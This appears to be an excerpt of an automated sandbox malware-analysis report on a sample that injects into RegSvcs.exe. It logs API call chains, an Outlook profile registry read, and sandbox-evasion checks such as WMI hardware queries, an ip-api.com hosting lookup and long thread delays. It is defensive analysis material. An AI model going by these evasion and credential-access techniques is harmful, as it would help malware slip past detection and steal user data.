                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000004.00000002.4676035615.0000000004121000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4673435255.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: juE8dtqPkx.exe, 00000000.00000003.2181560395.0000000004020000.00000004.00001000.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000000.00000003.2180821812.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000003.00000003.2191440096.0000000004070000.00000004.00001000.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000003.00000003.2194116768.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: juE8dtqPkx.exe, 00000000.00000003.2181560395.0000000004020000.00000004.00001000.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000000.00000003.2180821812.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000003.00000003.2191440096.0000000004070000.00000004.00001000.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000003.00000003.2194116768.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                  Source: juE8dtqPkx.exeStatic PE information: real checksum: 0xa961f should be: 0xf3962
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00416CB5 push ecx; ret 3_2_00416CC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C40C push cs; iretd 4_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00423149 push eax; ret 4_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C50E push cs; iretd 4_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004231C8 push eax; ret 4_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040E21D push ecx; ret 4_2_0040E230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C6BE push ebx; ret 4_2_0041C6BF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BD20D3 push edi; retf 4_2_02BD20D5
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_0047A330
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_00434418
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeAPI/Special instruction interceptor: Address: A83244
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeAPI/Special instruction interceptor: Address: 1683244
                  Source: RegSvcs.exe, 00000004.00000002.4674158790.0000000003152000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4676035615.0000000004121000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4673435255.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599867Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599724Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598266Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598020Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597307Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597150Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7574Jump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87770
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeAPI coverage: 3.6 %
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeAPI coverage: 3.6 %
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,3_2_004339B6
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00452492
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00442886
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_004788BD
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,3_2_0045CAFA
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00431A86
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,3_2_0044BD27
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0045DE8F FindFirstFileW,FindClose,3_2_0045DE8F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_0044BF8B
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599867Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599724Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598266Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598020Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597891Jump to behavior
